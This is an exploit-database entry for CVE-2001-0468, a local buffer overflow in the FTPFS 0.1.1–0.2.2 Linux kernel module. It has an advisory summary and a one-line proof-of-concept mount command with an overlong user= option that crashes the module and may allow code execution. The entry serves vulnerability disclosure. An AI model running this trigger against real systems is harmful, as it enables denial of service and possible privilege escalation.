FTPFS 0.1.1/0.2.1/0.2.2 - mount Buffer Overflow

Author: Frank DENIS
type: local
platform: linux
port: 
date_added: 2001-03-13  
date_updated: 2012-08-20  
verified: 1  
codes: CVE-2001-0468;OSVDB-13883  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 20691.txt  

source: https://www.securityfocus.com/bid/2498/info

FTPFS is a Linux kernel module allowing users to mount remote files from any standard FTP server as a local filesystem.

A version of FTPFS is vulnerable to a buffer overflow leading to a denial of service, and potentially execution of arbitrary code. This overflow can be exploited by any local user with access to the mount command on a system with FTPFS installed.

mount -t ftpfs none /mnt -o ip=127.0.0.1,user=xxxxxxxxxxxxxxxxxxxxxxxxxxxx...